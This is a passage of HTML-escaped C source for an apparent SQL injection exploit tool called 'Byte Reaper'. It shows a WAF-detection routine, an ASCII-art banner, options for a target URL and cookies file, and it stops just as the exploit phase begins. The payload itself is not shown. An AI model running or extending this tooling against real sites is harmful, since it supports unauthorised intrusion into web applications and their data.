||<br \/>\n<br \/>            code == 503)<br \/>\n<br \/>        {<br \/>\n<br \/>            printf(&#8220;\\e[1;35m============= [ WAF DETECTED ] =============\\e[0m\\n&#8221;);<br \/>\n<br \/>            printf(&#8220;\\e[1;34m[+] Blocking response code: %ld\\e[0m\\n&#8221;, code);<br \/>\n<br \/>            printf(&#8220;\\e[1;34m[+] Page is likely filtered by WAF.\\e[0m\\n&#8221;);<br \/>\n<br \/>            printf(&#8220;\\e[1;35m============================================\\e[0m\\n&#8221;);<br \/>\n<br \/>            step2 = 1;<br \/>\n<br \/>        }<br \/>\n<br \/>        else<br \/>\n<br \/>        {<br \/>\n<br \/>            printf(&#8220;\\e[1;31m[-] No blocking HTTP code.\\e[0m\\n&#8221;);<br \/>\n<br \/>            printf(&#8220;\\e[1;31m[-] WAF not detected based on HTTP code.\\e[0m\\n&#8221;);<br \/>\n<br \/>        }<\/p>\n<p>        printf(&#8220;[+] Step 3: Check Response Time\\e[0m\\n&#8221;);<br \/>\n<br \/>        if (timeD >= 3.0)<br \/>\n<br \/>        {<br \/>\n<br \/>            printf(&#8220;\\e[1;35m============= [ WAF DETECTED ] =============\\e[0m\\n&#8221;);<br \/>\n<br \/>            printf(&#8220;\\e[1;34m[+] Suspicious delay in response: %.2f sec\\e[0m\\n&#8221;, timeD);<br \/>\n<br \/>            printf(&#8220;\\e[1;35m============================================\\e[0m\\n&#8221;);<br \/>\n<br \/>            step3 = 1;<br \/>\n<br \/>        }<br \/>\n<br \/>        else<br \/>\n<br \/>        {<br \/>\n<br \/>            printf(&#8220;\\e[1;31m[-] Normal response time: %.2f sec\\e[0m\\n&#8221;, timeD);<br \/>\n<br \/>            printf(&#8220;\\e[1;31m[-] WAF not detected based on delay.\\e[0m\\n&#8221;);<br \/>\n<br \/>        }<br \/>\n<br \/>        printf(&#8220;[+] Step 4: Check Response Content\\e[0m\\n&#8221;);<br \/>\n<br \/>        for (int l = 0; l < numberWaf; l++)\n<br \/>        {<br \/>\n<br \/>            if (response.buffer)<br \/>\n<br \/>            {<br \/>\n<br \/>                if (strstr(response.buffer, 
keyWaf[l]))<br \/>\n<br \/>                {<br \/>\n<br \/>                    printf(&#8220;\\e[1;35m============= [ WAF DETECTED ] =============\\e[0m\\n&#8221;);<br \/>\n<br \/>                    printf(&#8220;\\e[1;34m[+] Word Found : %s\\e[0m\\n&#8221;,keyWaf[l]);<br \/>\n<br \/>                    printf(&#8220;\\e[1;34m[+] Waf Detected (Word Found In Response)\\e[0m\\n&#8221;);<br \/>\n<br \/>                    printf(&#8220;\\e[1;35m============================================\\e[0m\\n&#8221;);<br \/>\n<br \/>                    step4 = 1;<br \/>\n<br \/>                }<br \/>\n<br \/>                else<br \/>\n<br \/>                {<br \/>\n<br \/>                    printf(&#8220;\\e[1;31m[-] Word Not Found  : %s\\e[0m\\n&#8221;, keyWaf[l]);<br \/>\n<br \/>                    printf(&#8220;\\e[1;31m[-] WAF not detected (Not Found Word in response)\\e[0m\\n&#8221;);<br \/>\n<br \/>                }<br \/>\n<br \/>            }<br \/>\n<br \/>            else<br \/>\n<br \/>            {<br \/>\n<br \/>                printf(&#8220;\\e[1;31m[-] Response Buffer is NULL !\\n&#8221;);<br \/>\n<br \/>                printf(&#8220;\\e[1;35m[+] Step 5 : Check Response Server (NULL + Http Code 200)\\e[0m\\n&#8221;);<br \/>\n<br \/>                if (code == 200)<br \/>\n<br \/>                {<br \/>\n<br \/>                    printf(&#8220;\\e[1;35m============= [ WAF DETECTED ] =============\\e[0m\\n&#8221;);<br \/>\n<br \/>                    printf(&#8220;\\e[1;32m[+] Http Code : %ld\\n&#8221;, code);<br \/>\n<br \/>                    printf(&#8220;\\e[1;34m[+] Waf Detected (Response NULL And http Code 200)\\e[0m\\n&#8221;);<br \/>\n<br \/>                    if (verbose &#038;&#038; response.buffer)<br \/>\n<br \/>                    {<br \/>\n<br \/>                        printf(&#8220;\\e[1;35m[+] Response Server : ==========================================\\e[0m\\n&#8221;);<br \/>\n<br \/>                        
printf(&#8220;%s\\e[0m\\n&#8221;, response.buffer);<br \/>\n<br \/>                    }<\/p>\n<p>                    printf(&#8220;\\e[1;35m============================================\\e[0m\\n&#8221;);<br \/>\n<br \/>                    step5 = 1;<\/p>\n<p>                }<br \/>\n<br \/>                else<br \/>\n<br \/>                {<br \/>\n<br \/>                    printf(&#8220;\\e[1;31m[-] Waf Not Detected (Http Code not 200 And buffer NULL)!\\e[0m\\n&#8221;);<br \/>\n<br \/>                }<\/p>\n<p>            }<\/p>\n<p>        }<\/p>\n<p>    }<br \/>\n<br \/>    else<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;[!] curl_easy_perform() failed: %s\\e[0m\\n&#8221;, curl_easy_strerror(res));<br \/>\n<br \/>    }<\/p>\n<p>    printf(&#8220;\\e[1;35m[+] Step 6: Check Connection Reset\\e[0m\\n&#8221;);<br \/>\n<br \/>    if (res == CURLE_RECV_ERROR)<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;\\e[1;35m============= [ WAF DETECTED ] =============\\e[0m\\n&#8221;);<br \/>\n<br \/>        printf(&#8220;\\e[1;34m[+] Connection reset detected (CURLE_RECV_ERROR)\\e[0m\\n&#8221;);<br \/>\n<br \/>        printf(&#8220;\\e[1;35m============================================\\e[0m\\n&#8221;);<br \/>\n<br \/>    }<br \/>\n<br \/>    else<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;\\e[1;31m[-] No connection reset error.\\e[0m\\n&#8221;);<br \/>\n<br \/>    }<\/p>\n<p>    curl_slist_free_all(headers);<br \/>\n<br \/>    curl_easy_cleanup(curl);<br \/>\n<br \/>    printf(&#8220;\\e[1;35m\\n[+] Result Status Waf : \\e[0m\\n&#8221;);<br \/>\n<br \/>    if (step1 || step2 || step3 || step4 || step5)<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;\\e[1;36m[=] Final Verdict: WAF Detected \\e[0m\\n&#8221;);<br \/>\n<br \/>    }<br \/>\n<br \/>    else<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;\\e[1;31m[=] Final Verdict: No WAF Detected !\\e[0m\\n&#8221;);<br \/>\n<br \/>    }<br \/>\n<br \/>}<\/p>\n<p>int 
main(int argc,<br \/>\n<br \/>         const char **argv)<br \/>\n<br \/>{<br \/>\n<br \/>    printf<br \/>\n<br \/>    (<\/p>\n<p>        &#8220;\u28e6\u2803\u28ff\u28f6\u28f6\u28f6\u28f6\u28fe\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u2874\u28f2\u280b\u2881\u2874\u280b\u2801\u2800\u28e0\u2836\u280b\u2801\u2800\u28e0\u28b4\u2806\u2800\u28a0\u2806\u2800\u2880\u28e0\u289e\u2853\u2812\u2800\u2800\u2809\u2813\u2832\u28a4\u28c0\u2800\u2800\u2800\u2800\u2809\u28a7\u2840\u2800\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8221; \u2800\u28ff\u28ff\u28ff\u28ff\u28ff\u2807\u2800\u2800\u2800\u28c0\u2864\u281a\u2801\u287c\u28e3\u2874\u280b\u2800\u2800\u2880\u285e\u2801\u2800\u2800\u2880\u28e0\u28ff\u284b\u2800\u28e0\u28ff\u2834\u281a\u28c9\u28c9\u2809\u2809\u2809\u281b\u282d\u28df\u2812\u28a4\u28c0\u2808\u2819\u2826\u2884\u28c0\u2800\u2808\u28a3\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u2800\u28f8\u28ff\u28ff\u28ff\u28ff\u285f\u2800\u28f4\u281a\u2809\u2801\u2800\u2880\u287e\u281f\u2809\u2800\u2800\u28c0\u28f4\u285f\u2800\u2800\u28e0\u28d6\u28cb\u28b9\u28ff\u2881\u28fe\u28cf\u2820\u28a4\u28c0\u2840\u2809\u2819\u2806\u2800\u2800\u2800\u2808\u2833\u28a4\u2848\u2833\u28c4\u2800\u2800\u2809\u2819\u2836\u28cc\u28f3\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u2800\u28ff\u28ff\u28ff\u28ff\u287f\u2800\u2800\u2808\u281b\u28d2\u28d2\u287e\u280b\u2800\u2800\u2880\u28e4\u28fe\u28ab\u281f\u2800\u2800\u28f8\u2827\u28c4\u2818\u2833\u28af\u2849\u2808\u2809\u2813\u28c4\u2800\u2809\u283b\u28cd\u281b\u2832\u28c4\u2800\u2800\u2800\u2800\u2819\u28a6\u2848\u2813\u2884\u2800\u2800\u2800\u2800\u2819\u28b7\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        
&#8220;\u2878\u28ff\u28ff\u2879\u28bf\u28c3\u28c0\u2834\u280a\u2809\u28e0\u280e\u2800\u2800\u2880\u28f6\u28ff\u283e\u2875\u280b\u2800\u2800\u287c\u28e1\u2834\u28e6\u28c0\u28c0\u2800\u2809\u2832\u28c4\u2800\u2808\u28b3\u2840\u2800\u2800\u2831\u28c4\u2800\u2819\u2886\u2800\u2800\u2800\u2800\u2819\u28a6\u2840\u2831\u28c4\u2800\u2800\u2800\u2800\u2839\u28cc\u28d3\u28f6\u28b6\u2866\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28b3\u28ff\u28ff\u28ff\u28df\u281f\u2803\u2800\u28e0\u281e\u2801\u2800\u2800\u28e4\u281b\u281b\u2892\u28fe\u2881\u28f4\u28e4\u281e\u28b0\u2847\u28b8\u280b\u28bb\u2808\u28dd\u28a6\u2840\u2808\u2813\u2884\u2800\u2831\u2840\u2800\u2800\u2808\u2833\u2840\u2800\u2833\u28c4\u2800\u2800\u2800\u2800\u2819\u28a6\u2808\u2833\u2840\u2800\u2832\u28c4\u2808\u28bf\u2844\u2800\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28fc\u28ff\u28ff\u289f\u28e1\u2874\u28f9\u281f\u2881\u2800\u2880\u28e0\u281e\u2809\u28fd\u282f\u2809\u2889\u28fd\u28bf\u28f6\u28e4\u28b8\u2881\u283f\u2840\u28b8\u2847\u2898\u28a6\u28bb\u2873\u28c4\u2800\u2800\u2800\u2819\u28c6\u2800\u2800\u2800\u2819\u2886\u2800\u2818\u28a6\u2840\u2800\u2800\u2800\u2800\u2801\u2800\u2800\u2800\u2800\u2828\u2835\u28f6\u2844\u2800\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u287f\u28f5\u28ff\u280b\u283a\u28a5\u28f4\u28ef\u281e\u284b\u2880\u28e4\u281e\u28f1\u28af\u28f4\u280f\u28a1\u284f\u2800\u28bf\u2838\u28b8\u2840\u2847\u2808\u28e7\u2808\u28be\u288f\u28a7\u2848\u2813\u28a6\u2840\u2800\u2819\u28a7\u28c0\u2800\u2800\u2808\u2833\u28c4\u2800\u28b3\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2810\u28ba\u28ef\u28fd\u28e6\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        
&#8220;\u28ff\u28fe\u28ff\u2845\u2800\u2800\u2800\u2838\u282f\u282f\u2856\u280b\u28f0\u28e3\u28a3\u28ff\u2803\u2880\u280f\u28a0\u2800\u28fe\u2800\u285e\u28e7\u2847\u2800\u28b8\u2844\u2818\u28de\u2887\u28cc\u2886\u2800\u28bb\u2873\u28c4\u2840\u2808\u2813\u2824\u28c4\u2800\u2808\u28a3\u28c0\u283b\u2840\u28a6\u2840\u2800\u2800\u2800\u2800\u2880\u28c0\u28f0\u28c6\u2809\u285d\u28e7\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28af\u28ff\u2819\u28a6\u2800\u2800\u2800\u2800\u28fc\u2881\u28fc\u2887\u288f\u287f\u2803\u2800\u287e\u2800\u284c\u2880\u284f\u28b0\u2847\u28ff\u28bf\u2847\u28b8\u283b\u2800\u28b8\u285e\u28ef\u285c\u28a6\u2800\u28b7\u2808\u28bb\u2873\u28a4\u2840\u2808\u2819\u2812\u2800\u2819\u28b3\u28c5\u2800\u2819\u28c4\u2800\u2800\u28b8\u28ff\u28ff\u28ff\u28ff\u28c6\u28b0\u28f8\u2844\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u284f\u28fc\u28ff\u2812\u2812\u2824\u2824\u28a4\u28f8\u2803\u287c\u285b\u28b8\u28fc\u2847\u28a0\u28e0\u2801\u28b8\u2801\u28fc\u2847\u28b8\u2800\u287f\u28ff\u2847\u2838\u2800\u2800\u2800\u28bb\u2858\u28e7\u2818\u28c7\u2818\u2846\u2800\u2839\u28e6\u2848\u2813\u2826\u28c4\u2840\u2800\u2800\u2809\u2833\u28c4\u2808\u2887\u2800\u2810\u28bf\u28ff\u285b\u281f\u280b\u2800\u2847\u28e7\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28a0\u28ff\u28ff\u2800\u2800\u2800\u28e0\u287e\u287f\u28fc\u28e7\u2847\u2847\u28ff\u2800\u2800\u283b\u28c4\u2800\u2800\u2847\u2847\u2846\u2800\u28bb\u28ff\u2887\u28b6\u2840\u28a0\u2844\u2808\u287f\u2878\u2846\u28b8\u2800\u28a7\u2840\u2800\u28bb\u2819\u2886\u2800\u2800\u2809\u28b3\u2866\u28c4\u28c0\u28c8\u2819\u283e\u28c4\u2840\u2800\u2800\u28b0\u2800\u2800\u28a0\u2847\u28ff\u2800\u2800\\n&#8221;<br \/>\n<br \/>        
&#8220;\u28f8\u28ff\u28ff\u28c4\u28e4\u28fe\u281f\u28a0\u2847\u284f\u28ff\u2847\u28e7\u28ff\u2800\u28c0\u2840\u2808\u28e7\u2800\u2847\u2847\u2847\u28b8\u28b8\u28ff\u28b8\u28fc\u28b7\u2840\u2839\u28c4\u2801\u28b3\u2841\u2800\u2847\u2888\u28a3\u2800\u2808\u2847\u2808\u28a7\u2840\u2800\u2800\u28b7\u2840\u28a2\u2808\u28b9\u285b\u2813\u2819\u281b\u2812\u2808\u2847\u2800\u2838\u2847\u28ff\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u281f\u28e9\u285e\u2801\u2800\u28b8\u28f7\u2800\u285f\u2847\u28b8\u280b\u283b\u28b7\u28dd\u28a6\u28ff\u28c6\u2800\u2847\u2847\u28b8\u28fe\u28ff\u28bc\u28ff\u28fc\u28f3\u2844\u28b9\u28e7\u2840\u2801\u2800\u2817\u28b8\u28b8\u2800\u2800\u2847\u2800\u2800\u28f7\u2840\u2800\u2800\u28f7\u2848\u2800\u2800\u28a7\u2898\u2840\u2800\u2880\u2800\u28b8\u2840\u2800\u28c7\u28ff\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u281b\u28e1\u28fe\u284f\u2800\u2800\u2800\u2800\u28ff\u2800\u2803\u28bb\u28fc\u2840\u28e0\u2844\u2819\u283f\u285f\u28b9\u2818\u28ff\u2801\u2800\u2800\u28ff\u2800\u28bb\u2808\u284f\u283b\u2844\u28bf\u28b3\u2840\u2800\u2880\u285f\u2838\u2847\u2800\u28b8\u2800\u2800\u28b8\u28f7\u2840\u2800\u28b3\u2833\u2840\u2800\u2838\u284e\u2847\u2800\u2838\u2847\u2800\u28b7\u2800\u28b9\u2807\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28f4\u28ff\u28ff\u2847\u2800\u2800\u2800\u2800\u2838\u28c6\u2800\u2818\u287f\u28ff\u28ff\u28c5\u2840\u2880\u281f\u2838\u2800\u28bb\u2865\u2800\u2800\u28ff\u2844\u28b8\u28c6\u28f1\u28c0\u2819\u28e6\u28af\u28b3\u2800\u28f8\u28a7\u2847\u28ff\u2800\u2838\u2800\u2800\u28f8\u28c7\u28b3\u2800\u2818\u2887\u28b9\u2840\u2800\u28c7\u2803\u2800\u2800\u2847\u2800\u284c\u28b7\u2848\u28c6\u2800\u2800\\n&#8221;<br \/>\n<br \/>        
&#8220;\u28ff\u28ff\u28ff\u2847\u2800\u2800\u2800\u2800\u2800\u2839\u28c4\u28a0\u28ff\u28ff\u281f\u280b\u28f5\u280f\u2800\u2800\u2800\u2838\u2847\u2808\u2819\u285f\u281b\u28ba\u2877\u28f6\u28ef\u28ed\u28c8\u28ff\u285f\u2847\u285f\u287c\u2847\u28ff\u2800\u2847\u2800\u2880\u28ff\u285e\u281a\u2840\u28fc\u2818\u2806\u28c7\u2800\u28b8\u2800\u2800\u2880\u2847\u2800\u2801\u2880\u2877\u28dc\u28c4\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u28ff\u2807\u2800\u2800\u2800\u2800\u2800\u2800\u2818\u28ba\u284f\u28bf\u28e4\u281e\u2801\u2800\u2800\u2800\u2800\u2800\u28f7\u2800\u2800\u2800\u2800\u2838\u2847\u2800\u28b3\u2808\u2819\u283b\u28bf\u28ff\u2880\u28e7\u2847\u28ff\u28f0\u2803\u2880\u28fe\u28ff\u28f5\u2800\u28e0\u280f\u2847\u2800\u28ff\u2800\u284e\u28a0\u28e0\u28fc\u2847\u2800\u28b8\u28bf\u2847\u2818\u283b\u28c4\\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u28ff\u2812\u2812\u2812\u2812\u2812\u2812\u2812\u2800\u28b8\u2847\u2800\u28a7\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2801\u28f4\u2808\u2803\u2800\u2800\u28f8\u280f\u28fc\u2878\u285f\u28f3\u2803\u2880\u285e\u28cf\u288b\u28fc\u285f\u2801\u2800\u2847\u28a0\u280f\u28f8\u28f1\u28fe\u28df\u287f\u2861\u2880\u287f\u287f\u2847\u2800\u2800\u2808  \\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u284f\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2818\u28c7\u2800\u2800\u28b9\u2866\u2824\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28fc\u285f\u2800\u2800\u2800\u28f0\u280f\u2800\u2883\u28a7\u2877\u2803\u28e0\u280f\u2800\u2809\u287e\u28b9\u28bb\u2800\u2876\u2823\u280e\u2880\u28fe\u28fb\u283f\u28f8\u281b\u28a1\u285e\u28fc\u2801\u2831\u2800\u2800\\n&#8221;<br \/>\n<br \/>        
&#8220;\u28ff\u287f\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28b9\u2800\u2800\u2808\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28a0\u28fe\u28ff\u2847\u2800\u2800\u2816\u2801\u2800\u2800\u281e\u285e\u2881\u28f4\u2825\u2816\u281b\u28bf\u28b7\u28fe\u287e\u2846\u28ff\u28f6\u28cb\u28fe\u28ff\u28cf\u2800\u28b9\u287e\u280b\u28b0\u2801\u2800\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28c1\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2808\u28c7\u2830\u28c4\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2838\u28ff\u287f\u2801\u2800\u2800\u2800\u2800\u2800\u2880\u28fc\u28f5\u285e\u2801\u2880\u2854\u2800\u28ff\u28c1\u28fc\u2805\u28e7\u2801\u2818\u28ff\u287c\u280b\u28b8\u2846\u2800\u28b7\u28b8\u2800\u2800\u2800\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u284f\u2808\u2809\u2832\u28c4\u2840\u2800\u2800\u2880\u28c0\u28e4\u28f6\u28ff\u28ff\u2800\u2888\u2819\u2836\u28a6\u28c0\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u2874\u280b\u2801\u28b8\u2803\u2889\u287f\u2800\u2800\u28b8\u28fd\u2803\u2800\u2839\u28c4\u28fc\u2837\u2803\u2800\u2800\u28b3\u2800\u2818\u28ef\u28a7\u2800\u2800\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28e4\u28e4\u28e4\u28e4\u28e4\u28fd\u28f7\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u2847\u2800\u2819\u2832\u28e4\u2808\u2819\u2832\u28e4\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28f4\u28ec\u28e4\u2824\u2816\u281a\u281b\u2809\u2800\u2800\u2800\u2800\u28ff\u2800\u2800\u2800\u28ff\u2801\u2800\u2800\u2800\u2880\u28fc\u2803\u28b0\u284f\u2800\u2801\u2800\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        
&#8220;\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28e7\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u2874\u281e\u2809\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28c0\u287c\u2801\u2800\u2800\u28fc\u2819\u2802\u2800\u28c0\u2876\u280b\u2880\u28e0\u281e\u2801\u2800\u2800\u2800\u2800\u2800\u2800\u2800\\n &#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28f4\u280b\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28e0\u2834\u281a\u2809\u2800\u2800\u2880\u2874\u2801\u2800\u28e0\u281e\u2881\u28f4\u28be\u28ef\u28c4\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28f7\u28e4\u28c0\u28c0\u28c0\u28c0\u28c0\u28c0\u28c0\u2860\u28a4\u281e\u2801\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28e0\u2824\u281e\u280b\u2881\u28c0\u28e0\u2824\u2834\u281a\u2809\u28c0\u28e0\u281c\u2881\u2874\u28ff\u28e7\u28f8\u28ff\u28ff\u28ff\u28ff\u28ff\u28f7\u28f6\u28f6\u28e6\u28e4\u28c4 \\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u2809\u283b\u28c5\u2800\u2800\u2800\u2800\u285e\u2800\u2800\u2800\u2800\u2800\u2880\u28e0\u2816\u280b\u2801\u2800\u2812\u280a\u2809\u2801\u2800\u2800\u2800\u2880\u28c0\u28ed\u28e4\u2856\u288b\u28fc\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff \\n&#8221;<br \/>\n<br \/>        
&#8220;\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28f7\u2840\u2808\u2813\u2826\u28c4\u28f8\u2801\u2800\u2800\u2800\u2800\u2800\u2808\u2800\u2800\u2800\u2800\u2800\u2800\u28c0\u2864\u2834\u28ba\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u2880\u28fe\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff \\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28f7\u28c4\u2800\u2800\u2800\u28bb\u28c0\u28c0\u2864\u2834\u2836\u2836\u2836\u2836\u2826\u28a4\u28e4\u2816\u280b\u2801\u2800\u28f0\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u287f \\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28f7\u28e4\u28c0\u285e\u2809\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2808\u28f7\u2880\u28f4\u28fe\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u287f\u280b\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u2800\u2800\u2800\u2800\u28c0\u2864\u2834\u2836\u2836\u2836\u28a4\u28c0\u28fc\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u287f\u280b\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        
&#8220;\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28e7\u28c0\u2874\u280b\u2801\u2800\u2800\u2800\u2800\u2800\u2800\u2808\u28bf\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u280b\u2800\u2800\u2800\u2800\u2800\\n&#8221;<\/p>\n<p>    );<br \/>\n<br \/>    const char *name = &#8220;\\e[1;37m\\t\\t\\t[ Byte Reaper ]\\e[0m\\n&#8221;;<br \/>\n<br \/>    int s = 0;<br \/>\n<br \/>    while (name[s] != &#8216;\\0&#8217;)<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;%c&#8221;, name[s]);<br \/>\n<br \/>        fflush(stdout);<br \/>\n<br \/>        usleep(100000);<br \/>\n<br \/>        s++;<br \/>\n<br \/>    }<\/p>\n<p>    printf(&#8220;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n&#8221;);<br \/>\n<br \/>    struct argparse_option options[] =<br \/>\n<br \/>    {<br \/>\n<br \/>        OPT_HELP(),<br \/>\n<br \/>        OPT_STRING(&#8216;u&#8217;,<br \/>\n<br \/>                   &#8220;url&#8221;,<br \/>\n<br \/>                   &#038;yourUrl,<br \/>\n<br \/>                   &#8220;Target Url (Base URL)&#8221;),<br \/>\n<br \/>        OPT_STRING(&#8216;c&#8217;,<br \/>\n<br \/>                   &#8220;cookies&#8221;,<br \/>\n<br \/>                   &#038;cookies,<br \/>\n<br \/>                   &#8220;cookies File&#8221;),<br \/>\n<br \/>        OPT_BOOLEAN(&#8216;v&#8217;,<br \/>\n<br \/>                    &#8220;verbose&#8221;,<br \/>\n<br \/>                    &#038;verbose,<br \/>\n<br \/>                    &#8220;Verbose Mode&#8221;),<br \/>\n<br \/>        OPT_END(),<br \/>\n<br \/>    };<br \/>\n<br \/>    struct argparse argparse;<br \/>\n<br \/>    argparse_init(&#038;argparse,<br \/>\n<br \/>                  options,<br \/>\n<br \/> 
                 NULL,<br \/>\n<br \/>                  0);<\/p>\n<p>    argparse_parse(&#038;argparse,<br \/>\n<br \/>                   argc,<br \/>\n<br \/>                   argv);<br \/>\n<br \/>    if (!yourUrl)<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;\\e[1;31m[-] Please Enter Your Url !\\e[0m\\n&#8221;);<br \/>\n<br \/>        printf(&#8220;\\e[1;31m[-] Ex : .\/exploit -u http:\/\/URL\\e[0m\\n&#8221;);<br \/>\n<br \/>        printf(&#8220;\\e[1;31m[-] Exit Syscall\\e[0m\\n&#8221;);<br \/>\n<br \/>        exitAssembly();<br \/>\n<br \/>    }<br \/>\n<br \/>    checkWaf(yourUrl);<br \/>\n<br \/>    printf(&#8220;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\e[0m\\n\\n&#8221;);<br \/>\n<br \/>    printf(&#8220;[+] Start Exploit Sql&#8230;\\e[0m\\n&#8221;);<br \/>\n<br \/>    if (cookies)<br \/>\n<br \/>    